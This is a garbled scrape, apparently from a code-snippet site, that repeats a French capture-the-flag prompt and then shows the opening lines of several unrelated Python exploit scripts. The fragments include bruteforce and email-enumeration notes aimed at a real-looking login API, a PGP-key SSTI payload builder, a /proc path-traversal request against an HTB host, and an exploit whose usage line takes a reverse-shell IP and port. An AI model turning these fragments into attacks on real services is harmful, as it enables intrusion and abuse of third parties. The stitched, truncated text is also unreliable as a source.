My app is faulty can you get the flag?? https://smug.flag4all.sh Format du flag : flag{xxx}
app/app.py
#!/usr/bin/env python3 | |
import requests | |
import base64 | |
import getpass | |
# as i see there is no rate limit implemented , we can bruteforce through all API endpoints. | |
# the register page can also be used in order to spam their backend. | |
API_FORGOT_PAGE = "https://api.seela.io/hub/auth/forgot-password" # Permit email enumeration | |
API_LOGIN_PAGE = "https://api.seela.io/hub/auth/login" |
#!/usr/bin/env python3 | |
import requests | |
import pgpy | |
from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm | |
from urllib3.exceptions import InsecureRequestWarning | |
import base64 | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
def createPGPKeysPayload(ssti_payload): |
My app is faulty can you get the flag?? https://smug.flag4all.sh Format du flag : flag{xxx}
app/app.py
#!/usr/bin/env python3 | |
import requests | |
import string | |
import random | |
import sys | |
from urllib3.util import SKIP_HEADER | |
from collections import OrderedDict | |
import subprocess | |
from threading import Thread | |
import socket |
#!/usr/bin/env python3 | |
import sys, threading, requests | |
URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd' | |
cookie = {'SESSA0': 'a'} | |
# find nginx worker processes | |
r = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie) | |
cpus = r.text.count('processor') |
#!/usr/bin/env python3 | |
import requests | |
import os | |
import subprocess | |
import asyncio | |
import threading | |
import netifaces | |
import smtpd | |
import asyncore |
#!/usr/bin/env python3 | |
"""Rusta Rhymes - Flag4All - Exploit | |
Usage: | |
exploit.py <url> <revshell_ip> <revshell_port> [--handler] | |
Options: | |
-h --help Show this screen. | |
--handler Automaticly setup a pwncat-cs handler on defined port |
#!/usr/bin/env python3 | |
import json | |
import os | |
import sys | |
import re | |
import binascii | |
from Crypto.Cipher import AES | |
from Crypto.Util.Padding import pad,unpad | |
BLOCK_SIZE = 16 |